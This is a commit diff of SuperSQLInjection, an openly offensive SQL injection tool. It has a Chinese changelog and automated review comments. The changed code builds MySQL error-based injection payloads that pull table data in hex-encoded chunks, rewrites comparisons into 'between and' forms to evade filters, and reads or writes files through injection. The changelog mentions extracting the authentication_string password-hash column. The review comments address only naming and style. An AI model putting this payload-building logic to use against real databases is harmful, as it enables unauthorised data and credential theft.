20181206
20181206 V1.0 正式版---
修改mysql获取的环境的配置文件,增加hash字段名为authentication_string的查询。
修复使用了between and绕过时,显错注入无法获取数据的情况。
修复MySQL显错注入,获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。
shack2 committed Dec 6, 2018
1 parent 337f7ed commit d27a7b1
Showing 2 changed files with 128 additions and 56 deletions.
89 changes: 43 additions & 46 deletions SuperSQLInjection/Main.cs
Expand Up @@ -230,7 +230,7 @@ public static String getSid()
return sid;
}

public static int version = 20181205;
public static int version = 20181206;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
Expand Down Expand Up @@ -1760,32 +1760,28 @@ public void addNodeToTreeList(TreeNode tn, String text, String type)
private String ByPassForBetween(String paylaod, int len)
{

String newpayload = "";
if (config.useBetweenByPass == false)
String newpayload = paylaod.Replace("{len}", len + "");
if(config.useBetweenByPass)
{
newpayload = paylaod.Replace("{len}", len + "");
}
else
{
paylaod = paylaod.Replace("{len}", "");
if (paylaod.IndexOf(">=") != -1)

if (newpayload.IndexOf(">=") != -1)
{
newpayload = paylaod.Replace(">=", " not between 0 and " + (len - 1));
newpayload = newpayload.Replace(">=", " not between 0 and " + (len - 1));
}
else if (paylaod.IndexOf(">") != -1)
else if (newpayload.IndexOf(">") != -1)
{
newpayload = paylaod.Replace(">", " not between 0 and " + len);
newpayload = newpayload.Replace(">", " not between 0 and " + len);
}
else if (paylaod.IndexOf("=") != -1)
else if (newpayload.IndexOf("=") != -1)
{
newpayload = paylaod.Replace("=", " between " + len + " and " + len);
newpayload = newpayload.Replace("=", " between " + len + " and " + len);
}
else if (paylaod.IndexOf("<") != -1)
{
newpayload = paylaod.Replace("<", " between 0 and " + len);
}

newpayload = newpayload.Replace("<", " between 0 and " + len);
}
}

return newpayload;
}

Expand Down Expand Up @@ -3862,44 +3858,45 @@ public void getDataValueByErrorByMySQL(Object opam)
try
{
GetDataPam gp = (GetDataPam)opam;
//获取数据长度

ListViewItem lvi = null;
foreach (String column in gp.columns)
{
//获取数据长度
String datas_payload_columns = MySQL.hex_value.Replace("{data}", MySQL.creatMySQLColumnsNoConcatStr(gp.columns, gp.table, gp.dbname, gp.limit));
String datas_payload_length = MySQL.concatMySQLColumn(MySQL.char_length.Replace("{data}", datas_payload_columns));

String datas_payload_columns = MySQL.creatMySQLColumnStr(column);
String datas_payload_length = MySQL.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)");
String datas_payload_length_error = MySQL.error_value.Replace("{data}", datas_payload_length);

String d_l_e = MySQL.creatMySQLColumnStr("(" + datas_payload_length + ")");
String datas_payload_length_error = MySQL.error_value.Replace("{data}", d_l_e);
String result_length = getOneDataByUnionOrError(datas_payload_length_error);

String result_length = getOneDataByUnionOrError(datas_payload_length_error);
int sumlen = Tools.convertToInt(result_length);

int sumlen = Tools.convertToInt(result_length);
String datas_value_payload = "(select " + MySQL.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
String result = "";
int start = 1;
//每次获取长度,err方式有长度限制
int count = 64 - 6;
this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info);
while (start < sumlen)
{
//hex编码,防止中文等乱码
String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count);
String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_column);
result += getOneDataByUnionOrError(c_datas_value_payload);
start += count;
}
String result = "";
int start = 1;
//每次获取长度,err方式有长度限制59个字符
int count = 64 - 6;
this.Invoke(new showLogDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!", LogLevel.info);
while (start < sumlen)
{
//hex编码,防止中文等乱码
String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_payload_columns).Replace("{start}", start.ToString()), count);
String c_datas_value_payload = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(datas_value_column));
result += getOneDataByUnionOrError(c_datas_value_payload);
start += count;
}

result = Tools.unHex(result, "UTF-8");
String[] items = Regex.Split(result, "\\$\\$\\$");
ListViewItem lvi = null;
foreach (String item in items)
{
if (lvi == null)
{
lvi = new ListViewItem(result);

lvi = new ListViewItem(item);
}
else
{
lvi.SubItems.Add(result);
lvi.SubItems.Add(item);
}

}
this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!", LogLevel.info);
Expand Down Expand Up @@ -5739,7 +5736,7 @@ public void readOrWriteFile()
try
{
String payload_len = MySQL.char_length.Replace("{data}", data_payload);
String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.creatMySQLColumnStr(payload_len));
String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.concatMySQLColumn(payload_len));

String result_length = getOneDataByUnionOrError(payload_len_error);

Expand All @@ -5755,7 +5752,7 @@ public void readOrWriteFile()
while (start < sumlen)
{
//hex编码,防止中文等乱码
String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count);
String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnCastStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count);
String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_tmp);
result += getOneDataByUnionOrError(c_datas_value_payload);
start += count;
Expand Down
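Review bot: `ByPassForBetween` carries the misspelled parameter `paylaod` through the rewrite, and the new first line `String newpayload = paylaod.Replace("{len}", len + "");` repeats it; renaming it to `payload` while the body is being reworked would spare the next reader checking whether `paylaod` and `newpayload` are two unrelated variables. In `getDataValueByErrorByMySQL` the separator handed to `Regex.Split(result, "\\$\\$\\$")` is a fixed string, so `result.Split(new[] { "$$$" }, StringSplitOptions.None)` expresses the same thing without a regex and without the double escaping. If both `//获取数据长度` comments (the one above the `ListViewItem lvi = null;` declaration and the one on the first statement inside the block) survive on the new side, one of them is redundant. That method starts and ends outside the hunk.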
95 changes: 85 additions & 10 deletions SuperSQLInjection/payload/MySQL.cs
Expand Up @@ -106,7 +106,7 @@ public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex,

if (i == showIndex)
{
sb.Append(creatMySQLColumnStr(columns) + ",");
sb.Append(concatMySQLColumnStr(columns) + ",");
}
else
{
Expand Down Expand Up @@ -148,7 +148,7 @@ public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,Str

if (i == showIndex)
{
sb.Append(creatMySQLColumnStr(data) + ",");
sb.Append(concatMySQLColumn(data) + ",");
}
else
{
Expand Down Expand Up @@ -188,7 +188,7 @@ public static String creatMySQLWriteFileByUnionByMuSQL(String path, String conte
public static String creatMySQLColumnsStrByError(List<String> columns, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder();
sb.Append(creatMySQLColumnStr(columns));
sb.Append(concatMySQLColumnStr(columns));

if (!Tools.checkEmpty(dbName))
{
Expand Down Expand Up @@ -216,8 +216,14 @@ public static String creatMySQLColumnsStrByError(List<String> columns, String ta

public static String creatMySQLColumnsStrByError(String column, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder();
sb.Append(creatMySQLColumnStr(column));
List<String> List = new List<String>();
List.Add(column);
return creatMySQLColumnsStrByError(List, table, dbName, limit);
}
public static String creatMySQLColumnsHexStrByError(String column, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder("(select ");
sb.Append(creatMySQLColumnHexStr(column));

if (!Tools.checkEmpty(dbName))
{
Expand All @@ -236,31 +242,68 @@ public static String creatMySQLColumnsStrByError(String column, String table, St
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1");
sb.Append(" limit " + limit + ",1)");

}
return sb.ToString();
}

public static String creatMySQLColumnsNoConcatStr(List<String> columns, String table, String dbName, int limit)
{


StringBuilder sb = new StringBuilder("(select concat(");
foreach (String c in columns) {
sb.Append(c + ",0x242424,");
}
if (columns.Count > 0)
{
sb.Remove(sb.Length - 10, 10);
}
sb.Append(")");
if (!Tools.checkEmpty(dbName))
{
sb.Append(" from " + dbName + ".");
if (!Tools.checkEmpty(table))
{
sb.Append(table);
}
}
else
{
if (!Tools.checkEmpty(table))
{
sb.Append(" from " + table);
}
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1)");

}
return sb.ToString();
}




/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnStr(List<String> columns)
public static String concatMySQLColumnStr(List<String> columns)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
for (int i = 0; i < columns.Count; i++)
{
if (columns.Count > 1)
{
sb.Append("ifnull(cast(" + columns[i] + " as char),0x20),0x242424,");
sb.Append(columns[i]+",0x242424,");
}
else
{
return creatMySQLColumnStr(columns[i]);
return concatMySQLColumn(columns[i]);
}

}
Expand All @@ -275,12 +318,13 @@ public static String creatMySQLColumnStr(List<String> columns)
}



/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnStr(String column)
public static String concatMySQLColumn(String column)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append(column);
Expand All @@ -289,5 +333,36 @@ public static String creatMySQLColumnStr(String column)

}

/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnCastStr(String column)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append("ifnull(cast(" + column + " as char),0x20)");
sb.Append(",0x215e5e)");
return sb.ToString();

}

/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String creatMySQLColumnHexStr(String column)
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append(hex_value.Replace("{data}",column));
sb.Append(",0x215e5e)");
return sb.ToString();

}




}
}
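Review bot: The XML doc blocks added for `creatMySQLColumnCastStr` and `creatMySQLColumnHexStr` are copies of the list overload's: each says `<param name="columns">列明</param>` although the parameter is named `column`, and `列明` reads as a typo for `列名`, so they should become `<param name="column">列名</param>` with a summary sentence that distinguishes each builder from the shared `生成查询列数据`. In the one-column `creatMySQLColumnsStrByError` the local `List<String> List = new List<String>();` is named after its own type; `columns` would read better, and a collection initializer (`new List<String> { column }`) removes the separate `Add` call. `creatMySQLColumnsNoConcatStr` also emits `select concat(` despite its `NoConcat` name, and repeats the `dbName`/`table`/`limit` tail already present in the two `ByError` builders, so a shared private helper for that tail would keep the three from drifting; a short comment explaining that the `10` in `sb.Remove(sb.Length - 10, 10)` is the length of the `,0x242424,` separator would also help.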
